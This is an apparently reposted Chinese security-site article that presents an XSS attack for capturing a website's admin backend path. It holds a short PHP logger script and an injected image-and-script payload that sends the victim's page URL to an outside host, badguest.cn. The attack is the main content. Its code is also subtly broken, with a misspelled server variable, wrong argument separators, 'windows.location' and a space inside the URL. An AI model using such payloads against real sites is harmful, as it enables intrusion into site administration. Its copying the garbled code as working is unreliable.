你的位置:聚盟网 >> 网络学院 >> 防护 >> 详细内容 在线投稿

XSS截获网站后台路径脚本

www.juoooo.com  2011年10月22日19:44  来源: 互联网   查看:   我要评论(0)  收藏  字号: TTT

cook.php
<?
$info = $_SERVER['QUSEY_STRING'];
if ($info) {
$fp = fopen("info.txt"."a");
fwrite($fp.$info."\n");
fclose($fp);
}
?>

使用代码:

插入:

<img name="ak" width=0 height=0 border=0></img><script>document.ak.src="http://www.badguest.cn /cook.php?"+windows.location.href;</script>

转自:bai度id已禁 blog

编辑: 伊小露
分享到:
顶:65 踩:73
【已经有468人表态】
58票
超赞
57票
震惊
51票
不解
58票
愤怒
58票
支持
54票
高兴
51票
无聊
81票
杯具
发表评论

网友评论仅供网友表达个人看法,并不表明本网同意其观点或证实其描述。

查看全部回复【已有0位网友发表了看法】
糗事吧 牛吧 私房话 经典吧
祝福墙许愿墙
随手记-天天记帐本
邀请达人
2013祝福短信,节日祝福语